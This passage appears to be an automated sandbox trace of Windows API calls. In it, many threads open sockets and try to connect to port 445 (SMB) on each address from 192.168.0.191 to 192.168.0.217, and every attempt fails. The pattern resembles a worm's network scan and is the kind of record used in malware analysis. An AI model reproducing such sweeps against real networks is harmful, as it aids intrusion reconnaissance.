[0143.896] htons (hostshort=0x1bd) returned 0xbd01 [0143.896] inet_addr (cp="192.168.0.191") returned 0xbf00a8c0 [0143.896] socket (af=2, type=1, protocol=0) returned 0x1134 [0143.896] connect (s=0x1134, name=0x1da7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.191"), namelen=16) returned -1 [0165.144] GetCurrentThreadId () returned 0xe54 [0165.144] GetCurrentThreadId () returned 0xe54 [0165.144] longjmp () [0165.144] GetCurrentThreadId () returned 0xe54 [0165.144] CloseHandle (hObject=0x1124) returned 1 [0165.144] GetCurrentThreadId () returned 0xe54 [0165.144] Sleep (dwMilliseconds=0x0) [0165.186] _endthreadex (_ReturnCode=0x0) Thread: id = 987 os_tid = 0xd00 [0143.897] GetCurrentThreadId () returned 0xd00 [0143.897] GetCurrentThreadId () returned 0xd00 [0143.897] GetCurrentThreadId () returned 0xd00 [0143.897] _errno () returned 0x2971428 [0143.897] wcslen (_String="192.168.0.192") returned 0xd [0143.898] wcstombs (in: _Dest=0x1d405098, _Source="192.168.0.192", _MaxCount=0xe | out: _Dest="192.168.0.192") returned 0xd [0143.898] htons (hostshort=0x1bd) returned 0xbd01 [0143.898] inet_addr (cp="192.168.0.192") returned 0xc000a8c0 [0143.898] socket (af=2, type=1, protocol=0) returned 0x1148 [0143.898] connect (s=0x1148, name=0x1dcbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.192"), namelen=16) returned -1 [0165.144] GetCurrentThreadId () returned 0xd00 [0165.144] GetCurrentThreadId () returned 0xd00 [0165.144] longjmp () [0165.144] GetCurrentThreadId () returned 0xd00 [0165.144] CloseHandle (hObject=0x1138) returned 1 [0165.144] GetCurrentThreadId () returned 0xd00 [0165.144] Sleep (dwMilliseconds=0x0) [0165.187] _endthreadex (_ReturnCode=0x0) Thread: id = 988 os_tid = 0x554 [0143.899] GetCurrentThreadId () returned 0x554 [0143.899] GetCurrentThreadId () returned 0x554 [0143.899] GetCurrentThreadId () returned 0x554 [0143.899] _errno () returned 0x2971cc8 [0143.899] wcslen (_String="192.168.0.193") returned 0xd [0143.899] wcstombs (in: _Dest=0x1d4060a0, _Source="192.168.0.193", _MaxCount=0xe | out: _Dest="192.168.0.193") returned 0xd [0143.899] htons (hostshort=0x1bd) returned 0xbd01 [0143.899] inet_addr (cp="192.168.0.193") returned 0xc100a8c0 [0143.899] socket (af=2, type=1, protocol=0) returned 0x115c [0143.899] connect (s=0x115c, name=0x1deffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.193"), namelen=16) returned -1 [0165.144] GetCurrentThreadId () returned 0x554 [0165.144] GetCurrentThreadId () returned 0x554 [0165.144] longjmp () [0165.144] GetCurrentThreadId () returned 0x554 [0165.144] CloseHandle (hObject=0x114c) returned 1 [0165.144] GetCurrentThreadId () returned 0x554 [0165.144] Sleep (dwMilliseconds=0x0) [0165.187] _endthreadex (_ReturnCode=0x0) Thread: id = 989 os_tid = 0xc9c [0143.900] GetCurrentThreadId () returned 0xc9c [0143.900] GetCurrentThreadId () returned 0xc9c [0143.900] GetCurrentThreadId () returned 0xc9c [0143.901] _errno () returned 0x2971ef0 [0143.901] wcslen (_String="192.168.0.194") returned 0xd [0143.901] wcstombs (in: _Dest=0x1d4070a8, _Source="192.168.0.194", _MaxCount=0xe | out: _Dest="192.168.0.194") returned 0xd [0143.901] htons (hostshort=0x1bd) returned 0xbd01 [0143.901] inet_addr (cp="192.168.0.194") returned 0xc200a8c0 [0143.901] socket (af=2, type=1, protocol=0) returned 0x1170 [0143.902] connect (s=0x1170, name=0x1e13fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.194"), namelen=16) returned -1 [0165.144] GetCurrentThreadId () returned 0xc9c [0165.144] GetCurrentThreadId () returned 0xc9c [0165.144] longjmp () [0165.145] GetCurrentThreadId () returned 0xc9c [0165.145] CloseHandle (hObject=0x1160) returned 1 [0165.145] GetCurrentThreadId () returned 0xc9c [0165.145] Sleep (dwMilliseconds=0x0) [0165.188] _endthreadex (_ReturnCode=0x0) Thread: id = 990 os_tid = 0xc8c [0143.903] GetCurrentThreadId () returned 0xc8c [0143.903] GetCurrentThreadId () returned 0xc8c [0143.903] GetCurrentThreadId () returned 0xc8c [0143.903] _errno () returned 0x2971aa0 [0143.903] wcslen (_String="192.168.0.195") returned 0xd [0143.903] wcstombs (in: _Dest=0x1d400070, _Source="192.168.0.195", _MaxCount=0xe | out: _Dest="192.168.0.195") returned 0xd [0143.903] htons (hostshort=0x1bd) returned 0xbd01 [0143.903] inet_addr (cp="192.168.0.195") returned 0xc300a8c0 [0143.903] socket (af=2, type=1, protocol=0) returned 0x1184 [0143.903] connect (s=0x1184, name=0x1e37fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.195"), namelen=16) returned -1 [0165.145] GetCurrentThreadId () returned 0xc8c [0165.145] GetCurrentThreadId () returned 0xc8c [0165.145] longjmp () [0165.145] GetCurrentThreadId () returned 0xc8c [0165.145] CloseHandle (hObject=0x1174) returned 1 [0165.145] GetCurrentThreadId () returned 0xc8c [0165.145] Sleep (dwMilliseconds=0x0) [0165.188] _endthreadex (_ReturnCode=0x0) Thread: id = 991 os_tid = 0x518 [0143.905] GetCurrentThreadId () returned 0x518 [0143.905] GetCurrentThreadId () returned 0x518 [0143.905] GetCurrentThreadId () returned 0x518 [0143.905] _errno () returned 0x2972340 [0143.905] wcslen (_String="192.168.0.196") returned 0xd [0143.905] wcstombs (in: _Dest=0x1d401078, _Source="192.168.0.196", _MaxCount=0xe | out: _Dest="192.168.0.196") returned 0xd [0143.905] htons (hostshort=0x1bd) returned 0xbd01 [0143.905] inet_addr (cp="192.168.0.196") returned 0xc400a8c0 [0143.905] socket (af=2, type=1, protocol=0) returned 0x1198 [0143.905] connect (s=0x1198, name=0x1e5bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.196"), namelen=16) returned -1 [0165.145] GetCurrentThreadId () returned 0x518 [0165.145] GetCurrentThreadId () returned 0x518 [0165.145] longjmp () [0165.145] GetCurrentThreadId () returned 0x518 [0165.145] CloseHandle (hObject=0x1188) returned 1 [0165.145] GetCurrentThreadId () returned 0x518 [0165.145] Sleep (dwMilliseconds=0x0) [0165.189] _endthreadex (_ReturnCode=0x0) Thread: id = 992 os_tid = 0xe50 [0143.906] GetCurrentThreadId () returned 0xe50 [0143.906] GetCurrentThreadId () returned 0xe50 [0143.906] GetCurrentThreadId () returned 0xe50 [0143.906] _errno () returned 0x2972568 [0143.906] wcslen (_String="192.168.0.197") returned 0xd [0143.906] wcstombs (in: _Dest=0x1d4080b0, _Source="192.168.0.197", _MaxCount=0xe | out: _Dest="192.168.0.197") returned 0xd [0143.906] htons (hostshort=0x1bd) returned 0xbd01 [0143.906] inet_addr (cp="192.168.0.197") returned 0xc500a8c0 [0143.906] socket (af=2, type=1, protocol=0) returned 0x11ac [0143.906] connect (s=0x11ac, name=0x1e7ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.197"), namelen=16) returned -1 [0165.145] GetCurrentThreadId () returned 0xe50 [0165.145] GetCurrentThreadId () returned 0xe50 [0165.145] longjmp () [0165.145] GetCurrentThreadId () returned 0xe50 [0165.145] CloseHandle (hObject=0x119c) returned 1 [0165.145] GetCurrentThreadId () returned 0xe50 [0165.145] Sleep (dwMilliseconds=0x0) [0165.189] _endthreadex (_ReturnCode=0x0) Thread: id = 993 os_tid = 0xe2c [0143.908] GetCurrentThreadId () returned 0xe2c [0143.908] GetCurrentThreadId () returned 0xe2c [0143.908] GetCurrentThreadId () returned 0xe2c [0143.908] _errno () returned 0x2972790 [0143.908] wcslen (_String="192.168.0.198") returned 0xd [0143.908] wcstombs (in: _Dest=0x1d40b0c8, _Source="192.168.0.198", _MaxCount=0xe | out: _Dest="192.168.0.198") returned 0xd [0143.908] htons (hostshort=0x1bd) returned 0xbd01 [0143.908] inet_addr (cp="192.168.0.198") returned 0xc600a8c0 [0143.908] socket (af=2, type=1, protocol=0) returned 0x11c0 [0143.908] connect (s=0x11c0, name=0x1ea3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.198"), namelen=16) returned -1 [0165.146] GetCurrentThreadId () returned 0xe2c [0165.146] GetCurrentThreadId () returned 0xe2c [0165.146] longjmp () [0165.146] GetCurrentThreadId () returned 0xe2c [0165.146] CloseHandle (hObject=0x11b0) returned 1 [0165.146] GetCurrentThreadId () returned 0xe2c [0165.146] Sleep (dwMilliseconds=0x0) [0165.190] _endthreadex (_ReturnCode=0x0) Thread: id = 994 os_tid = 0xe98 [0143.909] GetCurrentThreadId () returned 0xe98 [0143.910] GetCurrentThreadId () returned 0xe98 [0143.910] GetCurrentThreadId () returned 0xe98 [0143.910] _errno () returned 0x29729b8 [0143.910] wcslen (_String="192.168.0.199") returned 0xd [0143.910] wcstombs (in: _Dest=0x1d4090b8, _Source="192.168.0.199", _MaxCount=0xe | out: _Dest="192.168.0.199") returned 0xd [0143.910] htons (hostshort=0x1bd) returned 0xbd01 [0143.910] inet_addr (cp="192.168.0.199") returned 0xc700a8c0 [0143.910] socket (af=2, type=1, protocol=0) returned 0x11d4 [0143.910] connect (s=0x11d4, name=0x1ec7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.199"), namelen=16) returned -1 [0165.146] GetCurrentThreadId () returned 0xe98 [0165.146] GetCurrentThreadId () returned 0xe98 [0165.146] longjmp () [0165.146] GetCurrentThreadId () returned 0xe98 [0165.146] CloseHandle (hObject=0x11c4) returned 1 [0165.146] GetCurrentThreadId () returned 0xe98 [0165.146] Sleep (dwMilliseconds=0x0) [0165.191] _endthreadex (_ReturnCode=0x0) Thread: id = 995 os_tid = 0xe24 [0143.911] GetCurrentThreadId () returned 0xe24 [0143.911] GetCurrentThreadId () returned 0xe24 [0143.911] GetCurrentThreadId () returned 0xe24 [0143.911] _errno () returned 0x2972be0 [0143.911] wcslen (_String="192.168.0.200") returned 0xd [0143.911] wcstombs (in: _Dest=0x1d40a0c0, _Source="192.168.0.200", _MaxCount=0xe | out: _Dest="192.168.0.200") returned 0xd [0143.911] htons (hostshort=0x1bd) returned 0xbd01 [0143.911] inet_addr (cp="192.168.0.200") returned 0xc800a8c0 [0143.911] socket (af=2, type=1, protocol=0) returned 0x11e8 [0143.911] connect (s=0x11e8, name=0x1eebfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.200"), namelen=16) returned -1 [0165.146] GetCurrentThreadId () returned 0xe24 [0165.146] GetCurrentThreadId () returned 0xe24 [0165.146] longjmp () [0165.146] GetCurrentThreadId () returned 0xe24 [0165.146] CloseHandle (hObject=0x11d8) returned 1 [0165.146] GetCurrentThreadId () returned 0xe24 [0165.146] Sleep (dwMilliseconds=0x0) [0165.191] _endthreadex (_ReturnCode=0x0) Thread: id = 996 os_tid = 0x310 [0143.912] GetCurrentThreadId () returned 0x310 [0143.912] GetCurrentThreadId () returned 0x310 [0143.913] GetCurrentThreadId () returned 0x310 [0143.913] _errno () returned 0x294b7c0 [0143.913] wcslen (_String="192.168.0.201") returned 0xd [0143.913] wcstombs (in: _Dest=0x1d40c0d0, _Source="192.168.0.201", _MaxCount=0xe | out: _Dest="192.168.0.201") returned 0xd [0143.913] htons (hostshort=0x1bd) returned 0xbd01 [0143.913] inet_addr (cp="192.168.0.201") returned 0xc900a8c0 [0143.913] socket (af=2, type=1, protocol=0) returned 0x11fc [0143.913] connect (s=0x11fc, name=0x1f0ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.201"), namelen=16) returned -1 [0165.146] GetCurrentThreadId () returned 0x310 [0165.146] GetCurrentThreadId () returned 0x310 [0165.146] longjmp () [0165.146] GetCurrentThreadId () returned 0x310 [0165.146] CloseHandle (hObject=0x11ec) returned 1 [0165.146] GetCurrentThreadId () returned 0x310 [0165.146] Sleep (dwMilliseconds=0x0) [0165.192] _endthreadex (_ReturnCode=0x0) Thread: id = 997 os_tid = 0xa24 [0143.914] GetCurrentThreadId () returned 0xa24 [0143.914] GetCurrentThreadId () returned 0xa24 [0143.914] GetCurrentThreadId () returned 0xa24 [0143.914] _errno () returned 0x29796c8 [0143.914] wcslen (_String="192.168.0.202") returned 0xd [0143.914] wcstombs (in: _Dest=0x1d40d0d8, _Source="192.168.0.202", _MaxCount=0xe | out: _Dest="192.168.0.202") returned 0xd [0143.914] htons (hostshort=0x1bd) returned 0xbd01 [0143.914] inet_addr (cp="192.168.0.202") returned 0xca00a8c0 [0143.914] socket (af=2, type=1, protocol=0) returned 0x1210 [0143.914] connect (s=0x1210, name=0x1f33fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.202"), namelen=16) returned -1 [0165.147] GetCurrentThreadId () returned 0xa24 [0165.147] GetCurrentThreadId () returned 0xa24 [0165.147] longjmp () [0165.147] GetCurrentThreadId () returned 0xa24 [0165.147] CloseHandle (hObject=0x1200) returned 1 [0165.147] GetCurrentThreadId () returned 0xa24 [0165.147] Sleep (dwMilliseconds=0x0) [0165.192] _endthreadex (_ReturnCode=0x0) Thread: id = 998 os_tid = 0x340 [0143.916] GetCurrentThreadId () returned 0x340 [0143.916] GetCurrentThreadId () returned 0x340 [0143.916] GetCurrentThreadId () returned 0x340 [0143.916] _errno () returned 0x29794a0 [0143.916] wcslen (_String="192.168.0.203") returned 0xd [0143.916] wcstombs (in: _Dest=0x1d415118, _Source="192.168.0.203", _MaxCount=0xe | out: _Dest="192.168.0.203") returned 0xd [0143.916] htons (hostshort=0x1bd) returned 0xbd01 [0143.916] inet_addr (cp="192.168.0.203") returned 0xcb00a8c0 [0143.916] socket (af=2, type=1, protocol=0) returned 0x1224 [0143.916] connect (s=0x1224, name=0x1f57fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.203"), namelen=16) returned -1 [0165.147] GetCurrentThreadId () returned 0x340 [0165.147] GetCurrentThreadId () returned 0x340 [0165.147] longjmp () [0165.147] GetCurrentThreadId () returned 0x340 [0165.147] CloseHandle (hObject=0x1214) returned 1 [0165.147] GetCurrentThreadId () returned 0x340 [0165.147] Sleep (dwMilliseconds=0x0) [0165.193] _endthreadex (_ReturnCode=0x0) Thread: id = 999 os_tid = 0xd0c [0143.917] GetCurrentThreadId () returned 0xd0c [0143.917] GetCurrentThreadId () returned 0xd0c [0143.917] GetCurrentThreadId () returned 0xd0c [0143.917] _errno () returned 0x29798f0 [0143.917] wcslen (_String="192.168.0.204") returned 0xd [0143.917] wcstombs (in: _Dest=0x1d40e0e0, _Source="192.168.0.204", _MaxCount=0xe | out: _Dest="192.168.0.204") returned 0xd [0143.917] htons (hostshort=0x1bd) returned 0xbd01 [0143.917] inet_addr (cp="192.168.0.204") returned 0xcc00a8c0 [0143.917] socket (af=2, type=1, protocol=0) returned 0x1238 [0143.918] connect (s=0x1238, name=0x1f7bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.204"), namelen=16) returned -1 [0165.147] GetCurrentThreadId () returned 0xd0c [0165.147] GetCurrentThreadId () returned 0xd0c [0165.147] longjmp () [0165.147] GetCurrentThreadId () returned 0xd0c [0165.147] CloseHandle (hObject=0x1228) returned 1 [0165.147] GetCurrentThreadId () returned 0xd0c [0165.147] Sleep (dwMilliseconds=0x0) [0165.196] _endthreadex (_ReturnCode=0x0) Thread: id = 1000 os_tid = 0xcb4 [0143.919] GetCurrentThreadId () returned 0xcb4 [0143.919] GetCurrentThreadId () returned 0xcb4 [0143.919] GetCurrentThreadId () returned 0xcb4 [0143.919] _errno () returned 0x2979b18 [0143.919] wcslen (_String="192.168.0.205") returned 0xd [0143.919] wcstombs (in: _Dest=0x1d416120, _Source="192.168.0.205", _MaxCount=0xe | out: _Dest="192.168.0.205") returned 0xd [0143.919] htons (hostshort=0x1bd) returned 0xbd01 [0143.919] inet_addr (cp="192.168.0.205") returned 0xcd00a8c0 [0143.919] socket (af=2, type=1, protocol=0) returned 0x124c [0143.919] connect (s=0x124c, name=0x1f9ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.205"), namelen=16) returned -1 [0165.147] GetCurrentThreadId () returned 0xcb4 [0165.147] GetCurrentThreadId () returned 0xcb4 [0165.147] longjmp () [0165.148] GetCurrentThreadId () returned 0xcb4 [0165.148] CloseHandle (hObject=0x123c) returned 1 [0165.148] GetCurrentThreadId () returned 0xcb4 [0165.148] Sleep (dwMilliseconds=0x0) [0165.196] _endthreadex (_ReturnCode=0x0) Thread: id = 1001 os_tid = 0xe38 [0143.921] GetCurrentThreadId () returned 0xe38 [0143.921] GetCurrentThreadId () returned 0xe38 [0143.921] GetCurrentThreadId () returned 0xe38 [0143.921] _errno () returned 0x2979d40 [0143.921] wcslen (_String="192.168.0.206") returned 0xd [0143.921] wcstombs (in: _Dest=0x1d40f0e8, _Source="192.168.0.206", _MaxCount=0xe | out: _Dest="192.168.0.206") returned 0xd [0143.921] htons (hostshort=0x1bd) returned 0xbd01 [0143.921] inet_addr (cp="192.168.0.206") returned 0xce00a8c0 [0143.921] socket (af=2, type=1, protocol=0) returned 0x1260 [0143.921] connect (s=0x1260, name=0x1fc3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.206"), namelen=16) returned -1 [0165.148] GetCurrentThreadId () returned 0xe38 [0165.148] GetCurrentThreadId () returned 0xe38 [0165.148] longjmp () [0165.148] GetCurrentThreadId () returned 0xe38 [0165.148] CloseHandle (hObject=0x1250) returned 1 [0165.148] GetCurrentThreadId () returned 0xe38 [0165.148] Sleep (dwMilliseconds=0x0) [0165.197] _endthreadex (_ReturnCode=0x0) Thread: id = 1002 os_tid = 0x42c [0143.922] GetCurrentThreadId () returned 0x42c [0143.922] GetCurrentThreadId () returned 0x42c [0143.922] GetCurrentThreadId () returned 0x42c [0143.922] _errno () returned 0x2979f68 [0143.922] wcslen (_String="192.168.0.207") returned 0xd [0143.922] wcstombs (in: _Dest=0x1d417128, _Source="192.168.0.207", _MaxCount=0xe | out: _Dest="192.168.0.207") returned 0xd [0143.922] htons (hostshort=0x1bd) returned 0xbd01 [0143.922] inet_addr (cp="192.168.0.207") returned 0xcf00a8c0 [0143.922] socket (af=2, type=1, protocol=0) returned 0x1274 [0143.922] connect (s=0x1274, name=0x1fe7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.207"), namelen=16) returned -1 [0165.148] GetCurrentThreadId () returned 0x42c [0165.148] GetCurrentThreadId () returned 0x42c [0165.148] longjmp () [0165.148] GetCurrentThreadId () returned 0x42c [0165.148] CloseHandle (hObject=0x1264) returned 1 [0165.148] GetCurrentThreadId () returned 0x42c [0165.148] Sleep (dwMilliseconds=0x0) [0165.198] _endthreadex (_ReturnCode=0x0) Thread: id = 1003 os_tid = 0xbc0 [0143.924] GetCurrentThreadId () returned 0xbc0 [0143.924] GetCurrentThreadId () returned 0xbc0 [0143.924] GetCurrentThreadId () returned 0xbc0 [0143.924] _errno () returned 0x2979278 [0143.924] wcslen (_String="192.168.0.208") returned 0xd [0143.924] wcstombs (in: _Dest=0x1d4100f0, _Source="192.168.0.208", _MaxCount=0xe | out: _Dest="192.168.0.208") returned 0xd [0143.924] htons (hostshort=0x1bd) returned 0xbd01 [0143.924] inet_addr (cp="192.168.0.208") returned 0xd000a8c0 [0143.924] socket (af=2, type=1, protocol=0) returned 0x1288 [0143.924] connect (s=0x1288, name=0x200bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.208"), namelen=16) returned -1 [0165.148] GetCurrentThreadId () returned 0xbc0 [0165.148] GetCurrentThreadId () returned 0xbc0 [0165.148] longjmp () [0165.148] GetCurrentThreadId () returned 0xbc0 [0165.148] CloseHandle (hObject=0x1278) returned 1 [0165.148] GetCurrentThreadId () returned 0xbc0 [0165.148] Sleep (dwMilliseconds=0x0) [0165.198] _endthreadex (_ReturnCode=0x0) Thread: id = 1004 os_tid = 0xca4 [0143.926] GetCurrentThreadId () returned 0xca4 [0143.926] GetCurrentThreadId () returned 0xca4 [0143.926] GetCurrentThreadId () returned 0xca4 [0143.926] _errno () returned 0x2978588 [0143.926] wcslen (_String="192.168.0.209") returned 0xd [0143.926] wcstombs (in: _Dest=0x1d4110f8, _Source="192.168.0.209", _MaxCount=0xe | out: _Dest="192.168.0.209") returned 0xd [0143.926] htons (hostshort=0x1bd) returned 0xbd01 [0143.926] inet_addr (cp="192.168.0.209") returned 0xd100a8c0 [0143.926] socket (af=2, type=1, protocol=0) returned 0x129c [0143.926] connect (s=0x129c, name=0x202ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.209"), namelen=16) returned -1 [0165.148] GetCurrentThreadId () returned 0xca4 [0165.148] GetCurrentThreadId () returned 0xca4 [0165.148] longjmp () [0165.148] GetCurrentThreadId () returned 0xca4 [0165.148] CloseHandle (hObject=0x128c) returned 1 [0165.149] GetCurrentThreadId () returned 0xca4 [0165.149] Sleep (dwMilliseconds=0x0) [0165.199] _endthreadex (_ReturnCode=0x0) Thread: id = 1005 os_tid = 0xcbc [0143.927] GetCurrentThreadId () returned 0xcbc [0143.927] GetCurrentThreadId () returned 0xcbc [0143.927] GetCurrentThreadId () returned 0xcbc [0143.927] _errno () returned 0x29787b0 [0143.927] wcslen (_String="192.168.0.210") returned 0xd [0143.927] wcstombs (in: _Dest=0x1d418130, _Source="192.168.0.210", _MaxCount=0xe | out: _Dest="192.168.0.210") returned 0xd [0143.927] htons (hostshort=0x1bd) returned 0xbd01 [0143.927] inet_addr (cp="192.168.0.210") returned 0xd200a8c0 [0143.927] socket (af=2, type=1, protocol=0) returned 0x12b0 [0143.927] connect (s=0x12b0, name=0x2053fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.210"), namelen=16) returned -1 [0165.149] GetCurrentThreadId () returned 0xcbc [0165.149] GetCurrentThreadId () returned 0xcbc [0165.149] longjmp () [0165.149] GetCurrentThreadId () returned 0xcbc [0165.149] CloseHandle (hObject=0x12a0) returned 1 [0165.149] GetCurrentThreadId () returned 0xcbc [0165.149] Sleep (dwMilliseconds=0x0) [0165.200] _endthreadex (_ReturnCode=0x0) Thread: id = 1006 os_tid = 0xcc0 [0143.929] GetCurrentThreadId () returned 0xcc0 [0143.929] GetCurrentThreadId () returned 0xcc0 [0143.929] GetCurrentThreadId () returned 0xcc0 [0143.929] _errno () returned 0x29789d8 [0143.929] wcslen (_String="192.168.0.211") returned 0xd [0143.929] wcstombs (in: _Dest=0x1d419138, _Source="192.168.0.211", _MaxCount=0xe | out: _Dest="192.168.0.211") returned 0xd [0143.929] htons (hostshort=0x1bd) returned 0xbd01 [0143.929] inet_addr (cp="192.168.0.211") returned 0xd300a8c0 [0143.929] socket (af=2, type=1, protocol=0) returned 0x12c4 [0143.929] connect (s=0x12c4, name=0x2077fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.211"), namelen=16) returned -1 [0165.149] GetCurrentThreadId () returned 0xcc0 [0165.149] GetCurrentThreadId () returned 0xcc0 [0165.149] longjmp () [0165.149] GetCurrentThreadId () returned 0xcc0 [0165.149] CloseHandle (hObject=0x12b4) returned 1 [0165.149] GetCurrentThreadId () returned 0xcc0 [0165.149] Sleep (dwMilliseconds=0x0) [0165.200] _endthreadex (_ReturnCode=0x0) Thread: id = 1007 os_tid = 0xb3c [0143.930] GetCurrentThreadId () returned 0xb3c [0143.930] GetCurrentThreadId () returned 0xb3c [0143.930] GetCurrentThreadId () returned 0xb3c [0143.930] _errno () returned 0x2978e28 [0143.930] wcslen (_String="192.168.0.212") returned 0xd [0143.930] wcstombs (in: _Dest=0x1d412100, _Source="192.168.0.212", _MaxCount=0xe | out: _Dest="192.168.0.212") returned 0xd [0143.930] htons (hostshort=0x1bd) returned 0xbd01 [0143.930] inet_addr (cp="192.168.0.212") returned 0xd400a8c0 [0143.930] socket (af=2, type=1, protocol=0) returned 0x12d8 [0143.930] connect (s=0x12d8, name=0x209bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.212"), namelen=16) returned -1 [0165.149] GetCurrentThreadId () returned 0xb3c [0165.149] GetCurrentThreadId () returned 0xb3c [0165.149] longjmp () [0165.149] GetCurrentThreadId () returned 0xb3c [0165.149] CloseHandle (hObject=0x12c8) returned 1 [0165.149] GetCurrentThreadId () returned 0xb3c [0165.149] Sleep (dwMilliseconds=0x0) [0165.201] _endthreadex (_ReturnCode=0x0) Thread: id = 1008 os_tid = 0xcd8 [0143.932] GetCurrentThreadId () returned 0xcd8 [0143.932] GetCurrentThreadId () returned 0xcd8 [0143.932] GetCurrentThreadId () returned 0xcd8 [0143.932] _errno () returned 0x2978c00 [0143.932] wcslen (_String="192.168.0.213") returned 0xd [0143.932] wcstombs (in: _Dest=0x1d41a140, _Source="192.168.0.213", _MaxCount=0xe | out: _Dest="192.168.0.213") returned 0xd [0143.932] htons (hostshort=0x1bd) returned 0xbd01 [0143.932] inet_addr (cp="192.168.0.213") returned 0xd500a8c0 [0143.932] socket (af=2, type=1, protocol=0) returned 0x12ec [0143.932] connect (s=0x12ec, name=0x20bffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.213"), namelen=16) returned -1 [0165.149] GetCurrentThreadId () returned 0xcd8 [0165.149] GetCurrentThreadId () returned 0xcd8 [0165.149] longjmp () [0165.149] GetCurrentThreadId () returned 0xcd8 [0165.149] CloseHandle (hObject=0x12dc) returned 1 [0165.149] GetCurrentThreadId () returned 0xcd8 [0165.150] Sleep (dwMilliseconds=0x0) [0165.201] _endthreadex (_ReturnCode=0x0) Thread: id = 1009 os_tid = 0x620 [0143.933] GetCurrentThreadId () returned 0x620 [0143.933] GetCurrentThreadId () returned 0x620 [0143.933] GetCurrentThreadId () returned 0x620 [0143.933] _errno () returned 0x2979050 [0143.933] wcslen (_String="192.168.0.214") returned 0xd [0143.933] wcstombs (in: _Dest=0x1d413108, _Source="192.168.0.214", _MaxCount=0xe | out: _Dest="192.168.0.214") returned 0xd [0143.933] htons (hostshort=0x1bd) returned 0xbd01 [0143.933] inet_addr (cp="192.168.0.214") returned 0xd600a8c0 [0143.933] socket (af=2, type=1, protocol=0) returned 0x1300 [0143.934] connect (s=0x1300, name=0x20e3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.214"), namelen=16) returned -1 [0165.150] GetCurrentThreadId () returned 0x620 [0165.150] GetCurrentThreadId () returned 0x620 [0165.150] longjmp () [0165.150] GetCurrentThreadId () returned 0x620 [0165.150] CloseHandle (hObject=0x12f0) returned 1 [0165.150] GetCurrentThreadId () returned 0x620 [0165.150] Sleep (dwMilliseconds=0x0) [0165.202] _endthreadex (_ReturnCode=0x0) Thread: id = 1010 os_tid = 0xcd4 [0143.935] GetCurrentThreadId () returned 0xcd4 [0143.935] GetCurrentThreadId () returned 0xcd4 [0143.935] GetCurrentThreadId () returned 0xcd4 [0143.935] _errno () returned 0x297a3b8 [0143.935] wcslen (_String="192.168.0.215") returned 0xd [0143.935] wcstombs (in: _Dest=0x1d41b148, _Source="192.168.0.215", _MaxCount=0xe | out: _Dest="192.168.0.215") returned 0xd [0143.935] htons (hostshort=0x1bd) returned 0xbd01 [0143.935] inet_addr (cp="192.168.0.215") returned 0xd700a8c0 [0143.935] socket (af=2, type=1, protocol=0) returned 0x1314 [0143.935] connect (s=0x1314, name=0x2107fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.215"), namelen=16) returned -1 [0165.150] GetCurrentThreadId () returned 0xcd4 [0165.150] GetCurrentThreadId () returned 0xcd4 [0165.150] longjmp () [0165.150] GetCurrentThreadId () returned 0xcd4 [0165.150] CloseHandle (hObject=0x1304) returned 1 [0165.150] GetCurrentThreadId () returned 0xcd4 [0165.150] Sleep (dwMilliseconds=0x0) [0165.203] _endthreadex (_ReturnCode=0x0) Thread: id = 1011 os_tid = 0xc48 [0143.936] GetCurrentThreadId () returned 0xc48 [0143.936] GetCurrentThreadId () returned 0xc48 [0143.936] GetCurrentThreadId () returned 0xc48 [0143.936] _errno () returned 0x297a5e0 [0143.936] wcslen (_String="192.168.0.216") returned 0xd [0143.936] wcstombs (in: _Dest=0x1d414110, _Source="192.168.0.216", _MaxCount=0xe | out: _Dest="192.168.0.216") returned 0xd [0143.936] htons (hostshort=0x1bd) returned 0xbd01 [0143.936] inet_addr (cp="192.168.0.216") returned 0xd800a8c0 [0143.936] socket (af=2, type=1, protocol=0) returned 0x1328 [0143.936] connect (s=0x1328, name=0x212bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.216"), namelen=16) returned -1 [0165.150] GetCurrentThreadId () returned 0xc48 [0165.150] GetCurrentThreadId () returned 0xc48 [0165.150] longjmp () [0165.150] GetCurrentThreadId () returned 0xc48 [0165.150] CloseHandle (hObject=0x1318) returned 1 [0165.150] GetCurrentThreadId () returned 0xc48 [0165.150] Sleep (dwMilliseconds=0x0) [0165.203] _endthreadex (_ReturnCode=0x0) Thread: id = 1012 os_tid = 0x114 [0143.938] GetCurrentThreadId () returned 0x114 [0143.938] GetCurrentThreadId () returned 0x114 [0143.938] GetCurrentThreadId () returned 0x114 [0143.938] _errno () returned 0x297a190 [0143.938] wcslen (_String="192.168.0.217") returned 0xd [0143.938] wcstombs (in: _Dest=0x1d41c150, _Source="192.168.0.217", _MaxCount=0xe | out: _Dest="192.168.0.217") returned 0xd [0143.938] htons (hostshort=0x1bd) returned 0xbd01 [0143.938] inet_addr (cp="192.168.0.217") returned 0xd900a8c0 [0143.938] socket (af=2, type=1, protocol=0) returned 0x133c [0143.938] connect (s=0x133c, name=0x214ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.217"), namelen=16) returned -1 [0165.150] GetCurrentThreadId () returned 0x114 [0165.150] 